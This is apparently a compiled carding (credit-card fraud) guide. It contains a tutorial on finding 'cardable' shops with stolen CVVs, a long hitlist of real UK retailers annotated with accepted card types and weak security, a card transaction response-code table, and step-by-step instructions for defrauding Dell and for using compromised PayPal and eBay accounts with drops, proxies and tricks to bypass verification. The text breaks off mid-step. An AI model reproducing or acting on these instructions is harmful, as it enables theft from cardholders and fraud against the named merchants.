+betthe.net +direcbet.com +easybets.com +eurobet.com +eurotip-online.com +expekt.com +fonbet.com +gamebookers.com +globet.com +goldbet.com +gwbet.com +indosoccer.com +intertops.com +interwetten.com +jazzsports.com +ladbrokes.com +lionbet.com +paysports.com +multibet.com +nordicbet.com +pacificsportclub.com +paddypower.com +parbet.com +pinnaclesports.com +playit.com +pointbet.com +premierbet.com +betroyal.com +sportonlinebookie.com +scandicbookmakers.com +wetten-schwechat.at +seangraham.com +skybet.com +snaisport.com +sportfanatik.com +sportingbet.com +sportingodds.co.uk +sportingoptions.co.uk + +sbobet.com +sports.com +sportsbetting.com +qksrv.net +sportwetten-online.de +stanjames.com +stanleybet.com +swapbets.com +thebet.cc +thegreek.com +totalbet.com +totesport.com +unibet.com +unitedbet.com +victorchandler.com +vierklee.com +vikingbet.com +vikingbet.com +wettpunkt.com +willhill.com +winunited.com +worldbet.com +worldwager.com +wsex.com +Cardable shops finding +Good day everybody! +I’d like to talk a little about cardable online-shops finding. It would be useful for some beginners. So for +getting list of shops go to _ww.amazon.com and of course to everybodie’s favorite google.com. When +you’ve got it – choose what you need. +Once you’ve chosen you need to check it. Usually they take some CVV’s and try to order on holder’s +address something in $300-$400 (for example PDA, MP3 player or another shiet like this). Also to avoid +too much attention choose not very fast delivery, something not expencive for 3-4 days delay. And wait. +If later you’ll got track – congratulations, you’ve found cardable shop. But it’s early to dance. There +would be a lot of problems later. For example shop can require call or scans on the order with amount +more $800-$1000 due to bad proxy, database of black addresses or enroll of cheap bank (First for +example )). +So that’s about all for beginners. Further improve and try new ways – that’s only base actions. + +CARDABLE SITES - HITLIST (90% of these shops ship) +http://www.casevalue.com/cgi- +bin/CaseValue.storefront/4ae961fd00107608273fc0a8018c064c/Catalog/1087 amxaccepted +http://www.arenaflowers.com/gifts/champagne_de_venoge_brut_rose amx accepted +http://www.virginwines.com/product/prod_detail.jsp?PRODUCT%3C%3Eprd_id=845524442977627 +http://www.champagneuk.com/catalog/?gclid=CLaIw5eB4p0CFVVu4wodgHflNA +http://cheers-wine-merchants.co.uk/Laurent-Perrier-Rose-Champagne-Rose-Wine-353.asp sec amx +accepted +http://www.thedrinkshop.com/products/nlpdetail.php?prodid=653&afwinid=90909 +http://www.bancroftwines.com/detailed.aspx?pID=10853&gclid=CNvHrNWC4p0CFQdl4wodL1CWNw +http://www.fromvineyardsdirect.com/wine/laurent_perrier.php? +gclid=CPWljuqC4p0CFUYA4wodz1VdMg +http://www.frw.co.uk/searchWines.aspx? +keywords=Laurent+Perrier+Rose&sid=4&FRS=GAd&gclid=CLbxjfWC4p0CFVtn4woduha8NA +http://www.laithwaites.co.uk/browsearticles.aspx? +Filter=WineType:browse_types,white&results_per_page=&cid=search|google|specific| +c2&mrc=pl48&gclid=CKHBlIyD4p0CFcts4wod6lW9OQ amxacceptd +https://www.giftsinternational.net/search_results.asp? +query=Laurent+Perrier&imageField.x=9&imageField.y=10&gclid=CNi1hqWD4p0CFUtp4wodgSYdNw +http://www.nakedwines.com/ +http://www.averys.com/default.aspx?mrc=E347&imi=winesdirectvoucher +http://www.formulawine.co.uk/wine/fresita +http://www.eburywinecellars.co.uk/products-page/champagne/page/2/ +http://www.majestic.co.uk/find/category-is-Champagne%20and%20Sparkling%20Wine/category-is- +Champagne/Special%20Offer-is-Special%20Offer?cmp=aw&cmp=aw +http://www.sparklingdirect.co.uk/pink_champagne.asp +http://www.bibendum-wine.co.uk/retail/wine-details/JLPNVROB6D/Laurent%20Perrier%20Rose +%20NV%2075cl +http://www.bbr.com/product-16286B-laurent-perrier-rose +http://www.hotwines.co.uk/catalog/product_info.php?products_id=39 +http://www.scottcountry.co.uk/products_detail.asp?productID=2447&froogle=true +http://www.winedancer.com/contents/en-uk/d263.html +http://www.woodenwinebox.co.uk/index.php?mod=category&id_ctg=6 +http://www.flowergram.co.uk/icat/champagnecasesgiftpacks amxaccepted +http://www.anybooze.com/moet--chandon-brut-imperial-champagne-341-p.asp +http://www.thewhiskyexchange.com/Search-hennessy.aspx +http://www.parkerswhisky.co.uk/luxury-gift-hampers-c-45.html? +osCsid=641beec7e176472ff1f931ebfd45a7ac amxaccepted ptx +http://shop.oliverscornwall.com/hennessy-paradis-extra-cognac-brandy-special-price-5-p.asp +http://www.chateauonline.co.uk/F-1012-alcool/P-15971-hennessy-paradis_1085319 +http://www.retail-world.net/store/comersus_message.asp?message=Cannot+get+product+details +%2E+Please+contact+us+to+request+more+information+about+item v and mc amx accepted +http://www.nextdaychampagne.co.uk/shopscr70.html +http://www.buyagift.co.uk/Product/Id/3268/Name/Gift_Bottle_of__Dom_Perignon_Vintage_2000_Cham +pagne +http://www.allgifts.ie/Dom-Perignon-Vintage-Champagne-Gift-!26726-version.html irish +http://www.pauladamsfinewines.co.uk/champagnes-967-0.html? +gclid=COShiYKN4p0CFU0A4wodPTL4Mw +http://www.wineandco.co.uk/chateau-lafite-rothschild-5517-m-uk-liv-uk.html +http://www.millesima.co.uk/F-1002-wine/K-119-Area~Bordeaux/K-115-Producers~Chateau-Lafite- +Rothschild?gclid=CJulj8-O4p0CFZQA4wodfjkkNw +http://www.evinite.com/bordeaux/pauillac/chateau-lafite-rothschild +http://www.antique-wine.com/lafite.php + +http://www.flower-delivery-uk.co.uk/champagne-gift.htm +http://www.toastchampagne.co.uk/shop/champagne/moet-et-chandon/ amx accepted +http://www.champagneexpress.co.uk/products.asp?pid=38 +http://www.oddbins.com/products/productDetail.asp?productcode=19062 amx acptd +http://www.cgarsltd.co.uk/1992-moet-chandon-champagne-cuvee-perignon-p-5984.html amx acceptd +http://www.robersonwinemerchant.co.uk/shop/gift-ideas/one-bottle-of-dom-perignon-gift-boxed +http://www.serenatawines.com/?s_kwcid=vintage%20wine|2819508707 amx acptd +http://www.jeroboams.co.uk/webapp/wcs/stores/servlet/catalog_10001_10001_-1 +http://www.magnum.co.uk/ +http://www.winedirect.co.uk/product_info.php?products_id=4628&from_id=8304 +http://www.cadmanfinewines.co.uk/ amx acptd +http://www.bennettsfinewines.com/store/ +http://www.nicholasrobertsltd.com/ +http://www.jaglass.co.uk/index.php? +main_page=index&cPath=36&zenid=1311e25b61fc6bfde4a1e5a01dd952c2 +http://www.laywheeler.com/?gclid=CNi8j9eZ4p0CFZoU4wod3i1TNQ +http://www.barrelsandbottles.co.uk/ +http://www.surf4wine.co.uk/ +http://www.winediscoveries.co.uk/ sec amx? +http://www.thesussexwinecompany.co.uk/shop/ amc acpt +http://www.viniferaboutique.com/store/index.php?route=product/category&path=38 +http://www.giftinspiration.com/acatalog/Wine_gifts.html +http://www.giftingdirect.co.uk/ +http://www.wineware.co.uk/ amx acpt +http://www.classicwinedirect.com/product-sub-category.aspx? +country=0&colour=2&grape=0&range=0&gclid=COanyfad4p0CFU0B4wod_yRZMw v and mc amx +http://www.satchellswines.com/ ppal amx +http://www.winestore.co.uk/shop/fine_wines.htm +http://www.thesecretcellar.co.uk/?gclid=CPDw8M2e4p0CFZoU4wod3i1TNQ +http://www.butlerswines.co.uk/?gclid=CLT3zOeg4p0CFVBd4wod32k4Mg ppal amx acptd +http://www.bestvintage.co.uk/ +http://winedown.co.uk/wine/louis-roederer-brut-premier-non-vintage-champagne.htm +http://www.nickollsandperks.co.uk/filter.asp? +pagenumber=1&pagesize=50&country=0009®ion=0020&grower=0744&gclid=CNGkkayi4p0CFVB +d4wod32k4Mg +http://www.thegoodwineshop.co.uk/Sparkling-Wine/Product-7421.aspx +http://shop.purewines.org/1999-cristal-champagne-jeroboam-3ltr-louis-roederer-743-p.asp +http://www.davy.co.uk/p/wineshop-buy-online/champagne-and-sparkling-wine/champagne- +selection/louis-roederer-brut-premier-nv-champagne.html +http://cellarandkitchen.adnams.co.uk/?utm_source=AW&utm_medium=cpa amx acptd +http://www.goedhuis.com/products/champagne/champagne/nv-louis-roederer-rich-2.html +http://www.gasconline.com/categories.php?Cat=2&SubCatID=228 +http://www.citychampagnes.com/louis-roederer.aspx amx axpt +http://www.fortnumandmason.com/(S(olioe255y4k4gtz2hikmef55))/catalog/productinfo.aspx? +id=7543&AspxAutoDetectCookieSupport=1 +http://www.corkr.com/winedetail.php?id=269 +http://www.sundaytimeswineclub.co.uk/DWBase/jsp/templates/article/productDetails.jsp?CID=MAIL| +55081&productId=prod26225 amx acpt +http://www.jacquel.be/Champagnes-Millesimes.php?pg=6&gclid=CPTxsJmo4p0CFUYA4wodz1VdMg +inter +soundslive +absolutemusic +guitar.co.uk merchant city music +reidys +dolphinmusic +guitarampkeyboard + +dv247 +gear4music v and mc +umbrellamusic v and mc +ukguitars +playrecord.net +musicshopdirect +guitarandampshop +musicstree +ollysguitar +visionguitars +steelcityguitars +fortissimoinstruments +themusicking +http://www.guitarvillage.co.uk/product-list.asp?manuid=119&catid=3 +http://www.nevadamusic.co.uk/Musical_Instrument_Accessories/Accessories/sc1218/p739.aspx +http://www.absolutemusic.co.uk/shop/view_product.php? +product=gbslpstebch1&gclid=CKH_vdaC9ZkCFQVfFQodcgqMRg +http://www.guitarampkeyboard.com/basket.php +http://www.gear4music.com/Electric_Guitars/Epiphone_Electric.html? +gclid=CJuatvCC9ZkCFQVfFQodcgqMRg +http://www.maxguitarstore.com/store/index.php?productID=3812 inter +http://www.dangleberrymusic.co.uk/Richwood_Guitars_Greenburst_Les_Paul_Guitar_Limited_Edition_ +Tre-pr-5247.html +http://www.realtimemusic.co.uk/gibson-gary-moore-bfg.html +http://www.mansons.co.uk/ v and mc sec +http://www.musicstreet.co.uk/accessories-cases-bags-c-27_84.html? +gclid=CPe_x4uE9ZkCFQMFZgodcEYFQg +http://www.hartnollguitars.co.uk/products.asp?id=3978 +http://www.soundslive.co.uk/product.asp?id=2346 v and mc sec +http://www.projectmusic.net/american-standard-stratocaster-3-color-sunburst-latest-version-2600-p.asp +http://www.soundpad.co.uk/ +http://www.chappellofbondstreet.co.uk/C~5034~Fender+Electric+Guitars +http://www.elmusic.co.uk/ +http://www.wembleydrumcentre.com/index.php?fuseaction=shopping.details&pId=14659&cId=3 +http://www.giggear.co.uk/b/Gibson/?gclid=CJv5rqKI9ZkCFQIWFQodP1nbRw +https://www.rainbowmusic.co.uk/sess/utn;jsessionid=1549e6f78956b77/shopdata/index.shopscript +http://www.thinkmusic.co.uk/prodtype.asp? +PT_ID=154&strPageHistory=cat&gclid=CIPIx_GI9ZkCFRMFZgodgCNJQw +http://www.bonnersmusic.co.uk/browse/Guitars__and__Basses/Acoustic_Guitars/Gibson_Guitars +http://www.hollywood-music.co.uk/products.php?product=Gibson-Hummingbird-Modern-Classic- +Acoustic-Guitar +http://www.soundsmusical.com/product.asp?productid=2206 +http://www.froogle.richersounds.com/showproduct.php?cda=showproduct&pid=MONS-BEATS-BY- +DR-DRE +http://www.iheadphones.co.uk/headphones/23820/Monster+Beats+by+Dr+Dre+High+Definition+Studio ++Headphones.htm +http://www.tribaluk.com/detail.php? + +ProdID=16cz0022&referrer=aw&utm_source=affiliatewindow&utm_medium=cpa v and mc +http://www.24electric.com/detail.php? +ProdID=83CZ9977&referrer=wg&source=webgains&siteid=4761&utm_source=webgains&utm_medium +=cpa&utm_content=All v and mc +http://www.bennettsonline.co.uk/product.asp? +activeproduct=16CZ0022&utm_source=affiliatewindow&utm_medium=cpa v and mc BK +http://shop4blu-ray.co.uk/catalog/product_info.php? +cPath=29&products_id=86&osCsid=5c87238a958085c2941600af02057f0e +http://www.hifiheadphones.co.uk/technics-rpdj1200-pro-dj-headphones-in-black-dj1200-dj-prodid- +293.html +http://www.studica.com/products/product_detail.cfm?productid=59470&storeid=4 +http://www.ableton.com/pages/shop/full INTER +http://www.htfr.com/more-info/MR219186 +http://www.chemical-records.co.uk/sc/servlet/Info?ref=gbase&Track=CDN88 +http://www.djpro.co.uk/product_info.php? +products_id=1371&shpsessid=b93b78e747e4186f298d6b2c92b080ca +http://www.decks.co.uk/products/video_jockey/numark +http://www.disco-centre.co.uk/discoequipment.html?gclid=CM-GwJWS9ZkCFQSwFQodrg0FRQ +http://www.bananadj.com/product12236_32440.aspx +http://www.turnkey.co.uk/product.php?itemid=7826 +https://www.studiocare.com/store/index.php?main_page=index&manufacturers_id=66 +http://www.studiospares.com/DJ-CD-Players/Pioneer-CDJ800-Mkii-DJ-CD-Player/invt/285540 +http://www.homedj.co.uk/ebuttonz/ebz_product_pages/pioneer_cdj800mk2.shtml?googlecpc +http://www.udmdjstore.co.uk/details.asp?ProductID=31130 v and mc +http://www.catapult.co.uk/products/DJ%20Equipment/PC%252FDigital +%20DJ/Numark+Total+Computer+DJ+in+a+Box +http://www.bosstunes.co.uk/djgear/catalog.php?keyword=numark low sec +http://www.prosound-dj.com/index.php? +manufacturers_id=22&osCsid=43d8c10b1d81b071f70df04913fb9f82 +http://www.westenddj.co.uk/productlist.asp?mk=numark +http://www.djgearpro.com/pioneer-cdj1000-digital-deck-p-47.html +http://www.djanddiscostuff.com/category.asp?catid=2 +http://www.djsuperstore.co.uk/item/dj-cd-mp3-players/068366-pioneer-cdj1000-mk3-single-cd-mp3- +player-%C2%A3899.00 +http://www.getinthemix.co.uk/index.htm/act/shop/process/cat/startnum/1/endnum/211/highlight/2/crit/cdj +1000/search/true?gclid=CJXUw_-W9ZkCFQVxFQod1huWQw +http://www.electroniccentre.co.uk/sub-section.aspx?title=DJ%20Equipment&title2=CD%20and +%20MP3%20Decks&id= +http://www.qualitydj.co.uk/pioneer-djm-600-p-55.html v and mc +http://www.thomann.de/gb/pioneer_djm_400.htm +http://www.djdevices.com/djequipment/Ecler_DJ_Mixers.html (mixers only) +http://www.soundlightltd.com/proddetail.php?prod=6067 +http://djempire.co.uk/product/pioneer-cdj-800-mk2-and-djm-400-package +http://www.avsl.co.uk/shop/cdj800-mk2-digital-cd-deck-with-scratch-jog-wheel-p-5789.html +http://www.total-music.com/catalogue.php?product_id=2730 +http://www.yonies.com/pidD.asp? + +chk=1&PID=2595&manf=Technics&model=SLDZ1200&prd=Turntable&lv1=Electronics&lv2=DJ+Equ +ipment&lv3=Turntables&rf=frguk inter +http://www.tamarshop.co.uk/index.php? +main_page=product_info&products_id=575&zenid=2b4bc645b985814785de763c851ba99c +https://www.scotaudio.com/acatalog/Technics_SL1200.html +http://www.discostudio.co.uk/item.php?upn=11305&affid=froogle v and mc +http://www.hifibitz.co.uk/product.asp?id=6681&aid=15036 bk v and mc +http://www.soundandvision.co.uk/hifi/turntables/technics-sl-1200mk5 +http://www.proav.co.uk/Audio-Equipment/c534.aspx +http://www.superfi.co.uk/index.cfm/page/moreinfo.cfm/Product_ID/1471/?utm_source=nextag +http://www.andertons.co.uk/PAMixers/pid15475/cid622/BoseL1SystemT1ToneMatchAudioEngineMixer +.asp +http://www.kmraudio.com/catalogue/product_info.php?products_id=620 +http://www.reverb-store.co.uk/product-detail.asp?prod=2442 +http://www.creativevideo.co.uk/public/view_item_cat.php?catalogue_number=apple_logic_studio +http://www.andertons.co.uk/MusicSoftware/pid9682/cid611/AppleLogicStudio8.asp +http://audiocooker.co.uk/shop/article_188/Apple-Logic-Studio-8.html +http://www.prolineaudio.co.uk/shopsub3.asp?submenu3=BHSX2442FX +http://www.ashcroft.absolutewebhosting2.co.uk/prod1.asp?ID=275 +http://www.andyou.co.uk/productdetail.asp?ProductID=TYROS3&title=Yamaha+Tyros+3 +http://shop.etsnet.co.uk/citronic-sm500-ultima-professional-mixer-38-p.asp +http://www.rosemorris.com/categories/Keyboard_Amplifiers/Keyboard_Amplifiers.html +http://www.overstock.com/Electronics/Pyle-PT4001X-5500-watt-Professional-DJ- +Amplifier/3818324/product.html?cid=133635 +http://www.thegreenwellystop.co.uk/whiskyshop/collectable/cat_4.html +http://www.masterofmalt.com/distilleries/allt-a-bhainne-whisky-distillery/ +http://www.4golfonline.com/bushnell-golf-m-40.html no v +http://www.golf-direct.co.uk/bushnell-neo-gps-golf-rangefinder-i5701.html no v +http://www.golfonline.co.uk/bushnell-golf-scope-rangefinder-p-3619.html amx axpt +http://www.nevadabobs.co.uk/Gadgets/Range-Finders/77scid/5972prodid.asp +http://www.thegolfshoponline.co.uk/index.cfm? +fuseaction=main.dspSingleProduct&productId=789&gclid=CLemnayo5Z0CFZQA4wodcAJ3MA no v +http://www.sheffieldprogolf.co.uk/Bushnell.html?gclid=CJTLxMOo5Z0CFWlr4wodTwhVMA amc acpt +http://www.tomorrowsgolfer.co.uk/products/Bushnell-Tour-V2-Laser-Rangefinder-Pinseeker.html no v +http://www.justgolfonline.co.uk/accessories/new-bushnell-tour-v2-rangefinder-p-1622.html ptx +http://www.binoculars-uk.co.uk/acatalog/Bushnell_Yardage_Pro_V2.html ptx amx acpt +http://www.nickylumb.com/superstore/itemdetl.php/itemprcd/01PR8401-1SZE no v +http://www.thegolfstore4u.co.uk/bushnell-tour-v2-laser-rangefinder-with-pinseeker-technology-p- +220.html ppal amx acpt +http://www.0800gadgets.co.uk/product.php/65100/267 ptx +http://golfclubseurope.co.uk/proddetail.php?prod=BNTV2LR no v +http://www.davidpartridgegolf.com/index.php? +page=shop.product_details&flypage=flypage.tpl&product_id=19&category_id=11&option=com_virtuem +art&Itemid=31&vmcchk=1&Itemid=31 no v +http://www.greavessports.com/tour-v2-rangefinder-p32299 no v +http://www.foot-steps.uk.com/section/21/1/golf_gps amx acpt +http://www.hdickinson.co.uk/product_page.php?id=83 ppal amx acpt +http://www.eventcaddie.com/bushnell-laser-range-finders.htm amx acpt +http://www.completegolfer.co.uk/cg7/store/comersus_listItems.asp?idCategory=196 +http://www.snaintongolf.co.uk/product.php/1707/skycaddie_sg2_5_range_finder ptx amx acpt +http://www.golffortune.co.uk/en/user?destination=cart%2Fcheckout inter +http://www.mensgiftshop.com/acatalog/golf-gifts.html v and mc +http://www.buysport.co.uk/ no v +http://www.onestopgiftshop.co.uk/c/grid/1/2/12/181/Gifts +http://www.tonyvalentine.com/ no v +http://www.golfwholesaledirect.com/shop/index.php? + +cPath=30_82&osCsid=2ea7fc95d1ad7ed53ea48bb3cd174072 no v +http://www.golf247.co.uk/cobra-irons-steel-2010-model-p-946.html?affiliate_banner_id=1&ref=9 +http://www.118golf.co.uk/Golf-Accessories/GPS-Rangefinders/prodlist_ct337.htm ptx +http://www.jamgolf.com/uk/finder/all/gps-devices/any/1 no v +http://www.gpsw.co.uk/?gclid=CMS55Lmt5Z0CFUQA4wodHAJ5Kw +http://www.snooperuk.com/snooper_products/gps_golf_shot_saver_range_finders/index.html no v +http://www.maximusgolf.co.uk/product.php/1187/skycaddie-sg-2-5-gps-black-golf- +rangefinder/dbca162d535b370bcec75ced581aa99d no v +http://www.americangolf.co.uk/golf-equipment/golf-accessories/golf-practice-aids---gadgets/skycaddie- +sg2-5-gps-range-finder/ no v +http://store.europeantour.com/stores/eurotour/products/product_browse.aspx?category%7Ccategory_root +%7C9698=balls+&+accessories&category%7Ccat_9698%7C9730=gps%2Frange+finders amc acpt +http://www.merlinlazer.com/Laser-Distance-Measurement-2?gclid=CIqQ0Yiu5Z0CFVtn4wodlh8dLg no +v +http://www.planetgolfuk.co.uk/shop/Monocular-Distance-Finder-p-18117.html no v +http://www.golfbidder.co.uk/golf-accessories/102/golf-range-finders.html no v +http://golf-gift.co.uk/store/catalog/Longridge-neoprene-iron-covers-p-16263.html ptx +http://www.golfizus.co.uk/ishop/1094/shopscr93.html +http://www.teedoff.co.uk/catalog/product.aspx?search=true&cid=703&pid=93611 ppal amx acpt +http://www.uttings.com/?categories/Rangefinders/bushnell/ no v +LIQ +http://www.parkerswhisky.co.uk/ ptx amx acpt +http://www.drambusters.com/ +http://www.maltwhiskyonline.com/ +http://www.whisky-online.com/ amc acpt +http://www.whiskyshop.com/ +https://www.lfw.co.uk/acatalog/ v and mc antica +http://www.whiskyshack.com/ +http://www.ocado.com/webshop/product/Laphroaig-10-Year-Old-Single-Islay-Malt-Whisky/16554011? +parentContainer=|22000|22717|22864|22871 +http://www.bakersandlarners.co.uk/ +http://www.mensgiftshop.com/acatalog/binoculars.html definet GOER max 3 notes up to 5 notes +http://www.skyviewoptics.co.uk/categories.asp?pg=545&tl=0 +http://www.camera-shop.co.uk/acatalog/Bushnell_Digital_Camera_Binoculars.html +http://www.campkinsonline.com/99/Nikon-Travelite-EX-10X25.html?referrer=Froogle +http://www.scottcountry.co.uk/products_detail.asp?productID=2861 +http://www.alloutdoor.co.uk/bushnell-permafocus-10x50-auto-focus-binoculars-2557-p.asp +http://www.adventurekit.co.uk/acatalog/Telescopes.html (telescope option) +http://www.ukcamo.com/StoreFrontProfiles/DeluxeSFItemDetail.aspx? +sfid=151943&c=167269&i=240590879 +http://www.flightstore.co.uk/DEPT-BIN/use/price.30-50 +http://www.uttings.com/?Categories/Optics/Binoculars/ +http://www.cabelas.com/cabelas/en/templates/purchase/item-added.jsp?_requestid=2668 inter +http://www.green-witch.com/acatalog/Swarovski.html?gclid=CJOCkIGH-pkCFUM-3godH0k9GA +http://www.harrisoncameras.co.uk/productdetail.kmod?productid=6060 +http://www.wilkinson.co.uk/store/product.php?productid=17720 +http://www.sportsmanguncentre.co.uk/productDetails.php? +categoryId=11712990177266&product=Leica+BR+Ultravid+8x20+Compact +http://www.purelygadgets.co.uk/showproduct.php?prodid=9981&wysiwyg=10 v and mc +http://www.harpersphoto.co.uk/product/opticron_8x32_zcf_ga_imagic_tga_wp_porro_prism_binoculars/ +hs v and mc +http://www.at-infocus.co.uk/opticron.html + +http://www.mynewcheap.co.uk/products/details/bushnell-h2o-binoculars-10x-25mm-13-1005/10659/ hs v +and mc +http://www.opticsale.com/zhumell-7x50-marine-binoculars-w-compass.html inter +http://www.obm.co.uk/products/db/454.htm +http://www.gamefayre.co.uk/index.cgi?d=4&ref=Google-Ad +campkinsonline +acecameras +pennineonline +theclassiccamera (lenses) +opticsplanet inter +astroshop +cameraking +survsys (laser testing equipment) +parkcameras +microglobe +allcam +bristolcameras +purelygadgets +ukoptics +binocularsshop +telescopesandbinoculars +eebc +morrisphoto +rgb-tech +lambda-tek +microglobe +the-binoculars-store +scopesnskies +cliftoncameras +at-infocus low sec +safari-store +green-witch +buzzoptics +rspboptics +swillingtonshootingsupplies. +leicashop inter +uttingsoutdoors +cameras2u +westwalesbinoculars BK v and mc +grahamsonline +cameramarts +binocularbarn +alanaecology +allcam +ukdigitalcameras +ukdigital +ukoptics possible connection with above +acecameras +devoncamera bk v and mc +photosolution +phonescorporation +simplyelectronics v and mc +dalephotographic +martinscamerashop +harrisoncameras +purelygadgets + +t4cameras +wilkinson v and mc +mifsuds low sec +calumetphoto +digitalcameraexchange +cameraworld +jacobsdigital v and mc +bitesizedeals +bccamera inter +simplyelectronics v and mc +camerabox +abc-digital-cameras +bentonvillemall v and mc +pixmania +cordless-phones v and mc +bestcameras +http://www.hairstyling.co.uk/acatalog/Straighteners.html +http://www.uksellmart.co.uk/ +http://www.ghdhairstores.co.uk/?gclid=COT71qXbtJoCFQZqswoddk06cg +http://keenbuy.co.uk/keenbuy/index.php?act=viewProd&productId=3 +http://enzohairandbeauty.myshopify.com/products/ghd-pure +beautyflash +hairsupermarket sec +beautique +gorgeousshop +great hair direct +ghdhairproducts +hqhair +skincareukcentre +ilovemyghd +asos +brindleys-hair +feelunique +heaven-spa +ghd-uk +abcbeautyshop +candyaddicted bk v and mc +paulkayhairproducts sec v and mc +besthairbrands bk v and mc +beautybay +salonskincare +francescogroup +slapiton.tv +saloneasy +hair1ukonline +body4real +ehaircare +justbeautifully v and mc +missbollywood +beautysleuth v and mc +prohaircare +assetchemist +prosalonsupplies +beautybay +buywiseuk v and mc +wantthelook + +exclusivebeauty +lookfantastic +powderpuff +folica inter +Card/ATM Reading Codes +EFTI Transaction Response Codes: +Response Processor Description +700 EFTI Completed Successfully +01 EFTI Refer to card issuer +02 EFTI Refer to card issuer, special condition +03 EFTI Invalid Merchant +04 EFTI Pick-up card +05 EFTI Do not honor +06 EFTI Error +07 EFTI Pick-up card, special condition +08 EFTI Honor with identification +09 EFTI Request in Progress +10 EFTI Approved, partial +11 EFTI Approved, VIP +12 EFTI Invalid transaction +13 EFTI Invalid amount +14 EFTI Invalid card number +15 EFTI No such issuer +16 EFTI Approved, update track 3 +17 EFTI Customer cancellation +18 EFTI Customer dispute +19 EFTI Re-enter transaction +20 EFTI Invalid response +21 EFTI No action taken +22 EFTI Suspected malfunction +23 EFTI Unacceptable transaction fee +24 EFTI File update not supported +25 EFTI Unable to locate record +26 EFTI Duplicate record +27 EFTI File update edit error +28 EFTI File update file locked +29 EFTI File update failed +30 EFTI Format error +31 EFTI Bank not supported +32 EFTI Completed partially +33 EFTI Expired card, pick-up +34 EFTI Suspected fraud, pick-up +35 EFTI Contact acquirer, pick-up +36 EFTI Restricted card, pick-up +37 EFTI Call acquirer security, pick-up +38 EFTI Pin tries exceeded, pick-up +39 EFTI No credit account + +40 EFTI Function not supported +41 EFTI Lost Card +42 EFTI No universal account +43 EFTI Stolen Card +44 EFTI No investment account +51 EFTI Not sufficient funds +52 EFTI No check account +53 EFTI No savings account +54 EFTI Expired card +55 EFTI Incorrect PIN +56 EFTI No card record +57 EFTI Transaction not permitted to cardholder +58 EFTI Transaction not permitted on terminal +59 EFTI Suspected fraud +60 EFTI Contact acquirer +61 EFTI Exceeds withdrawal limit +62 EFTI Restricted card +63 EFTI Security violation +64 EFTI Original amount incorrect +65 EFTI Exceeds withdrawal frequency +66 EFTI Call acquirer security +67 EFTI Hard capture +68 EFTI Response received too late +75 EFTI PIN tries exceeded +77 EFTI Intervene, bank approval required +78 EFTI Intervene, bank approval required for partial +90 EFTI Cut-off in progress +91 EFTI Issuer or switch inoperative +92 EFTI Routing Error +93 EFTI Violation of law +94 EFTI Duplicate transaction +95 EFTI Reconcile error +96 EFTI System malfunction +98 EFTI Exceeds Cash limit +Carding Dell Tutorial +something to prepare: +1. Fresh Drop (if ur drop is blacklist in DELL u won't pass even ur CC is good) +2. Good CCV (non-VBV or non-MSC) +3. Sock / VPN / SSH / VPS (tis not important, but good sock at same state of CC is better) +Now, let start: +A - If You Want To Make Only Single Order With Single Cvv2 ( Which is Valid and virgin Ofcourse !! ) +1- first check the cc and make sure it`s Valid .. choose Your Item (Fast-track items) +2- Click On Add To Cart Then Check Out , You Will Be Prompted To Sign Up For A New User Or Sign + +In If You Have An Existing Account ( Sign Up For A New Account ) +3- Enter The First And Last Name For Your Drop As The Account First And Last Name In The Sign Up +Page , Provide A Valid Email address And Password . +4- You`ll Be Redirected To The Shipping Info Page , You`ll Find The First Name and Last Name +Provided In The Sign Up Page Stored There , Just Add The Address and Other Info +*Note : You Don`t Have To Provide A Valid Phone Number For Shipping Address , The Billing Phone +Also Works For Shipping +5- Choose The Fastest Shipping Method (Next Day Air ) Also 2nd Day air will work , but Make Sure The +Total Amount Doesn`t Exceed 470-480 $ +6- On The Billing Page , Remove The Shipping Info Stored . Then Add The Billing Info Which Must Be +Same As stored In Bank ( Make Sure The CC Is 100 % Valid ) The Most IMPORTANT PART HERE IS +THE BILLING PHONE NUMBER +which must be the same stored with bank coz they use this number for verification ( not calling the card +holder , but to verify the info with bank ) +7- Don`t Choose Any Limit In The Billing Page ( Choose:No Limit ) +Click Submit !! +B- IF You Intend To Use The Same Card More Than Once To Order More Than 1 Item ; +*First Note That This Method May Get You In Trouble If You Send These Items To Your Own Home , +Also the items May get returned to shipper before You Recieve Them . +1- Follow The 1st Method For Ordering Single Item With 1 Cc , you`ll recieve 2 emails after ordering +( Dell Order Acknowledgement - Dell Order Confirmation ) as soon as You Recieve The Second Email +Which Is : Dell Order Confirmation +check the order status in 10 - 30 minutes IF You See Something Like (In-Production Or Pre-Production ) +Go To The Next Step . +2- Make Another Order and which must not exceed 480 $ +3- Follow All Previous Steps ( Storing Your Credit Card Info Will Ease The Mission ) +4- Repeat This For As Many Times as The Limit Of The CC Allow . +5- Don`t Make Any Orders If The Previous Order Status Isn`t ( In-Production OR Pre-Production ) +6- If They Suspect One Of The Orders They Will Cancel All Orders . Ofcourse Next Day Shipping +Method Will Decrease The Chance Of Getting Items Returned To Shipper . +That`s All , And Enjoy Your Carding Of DELL +P/s: +1. iIf U don't want to get problem with VBV or MSC, use Lolifox browser,with this browser Dell won't +ask u for VBV even though your CC is VBV, where to get it... Google is ur friend (try and see, its my +trick in DELL ) +2. if you recieve the Hold payment emails, don't abandon it, try to chat with DEll's customer service, and + +tell them u want to give new CC for your order, then give them new CCV infomation (this time they don't +check VBV or MSC) +3. with my experience, find Credit Signature CC, its have more % success +Carding Stuffs with PayPal +Required components: +1. Paypal [Us + verified + mail + instant] +2. EBay ACC with good feedbacks, preferably from 100, not an asset (preferably 6 months or more). +3. Good socks (and better Dedicated server) +4. enroll FIA card Services, or simply ACC FIA can be found on the link ibsnetaccess.com (or other +suitable) +working with eBay accompaniment: +1. Changing soap on their pre-creation. +2. Deleting from old evidence +3. Possible also pass change +All letters will be sent to your soap +What to do with enroll: +1.Going to roll, change the address for loot. +2.Push Shop Safe +3.Generating virtual cards for 3-6 bucks. +4.Writing number of creeds and Old about it. (Address loot think is already there, then roll the name of +the Holder is not involved) +5.Going on a stick, copy the name of the Holder (in handy later). +6.Finding click add or edit credit card info +7. Trying to drive there creed without changing the name of the Holder paragraphs, but trying to drive a +mail drop, the one on the roll. Cards immediately will confirmed. +Total - we stick with confirm address loot. +Next: +1. Checking much stick gives send through instant transfer. Ie trying to send a 300-500 bucks invented +mail. the amount depends on the material. +2. Ok Checked, for example sends a 500 +3. Going on eBay. Choose any pack within this amount is absolutely from any vendor, at least at the shop +goes online to eBay. +4. Pushing buy it now, go to the payment before the payment there you can enter the address where to +send, and so we press on the change address +Insert the name and address of the Holder stick drop, the phone adding is not necessary. +5. Pushing to pay. Proceed to a confirmation page charges. +6. Pushing Confirm, 